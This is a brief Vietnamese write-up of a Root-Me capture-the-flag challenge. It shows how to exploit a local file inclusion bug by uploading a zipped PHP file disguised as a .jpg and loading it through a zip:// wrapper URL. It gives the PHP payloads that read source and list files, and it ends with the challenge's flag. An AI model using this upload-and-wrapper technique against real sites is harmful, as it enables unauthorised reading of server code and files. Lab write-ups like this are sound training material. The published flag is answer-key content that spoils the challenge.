# Local File Inclusion - Wrappers

Để giải bài này, ta sẽ sử dụng Zip Wrapper

Trước tiên viết 1 file như sau:

```php
	<?php
	show_source('index.php');
	?>
```

Lưu là abc.php

Sau đó zip file này lại thành abc.zip và đổi tên thành abc.jpg

Upload lên và sử dụng payload PHP Zip Wrapper như sau :

`http://challenge01.root-me.org/web-serveur/ch43/index.php?page=zip://tmp/upload/WgtVj4Iye.jpg%23abc`

Với `WgtVj4Iye` là tên của file ảnh sau khi upload lên trang web, lúc này ta sẽ thấy source code của file index.php, nhưng nó ko có gì, lúc này ta sửa lại file như sau và thực hiện tương tự như trên: 

```php
	<?php
	$f = scandir('./');
	print_r($f)
	?>
```

Ta thấy có 1 file flag `flag-mipkBswUppqwXlq9ZydO.php`, ok giờ thì đọc file này làm như bước 1

---

### Flag:

`lf1-Wr4pp3r_Ph4R_pwn3d`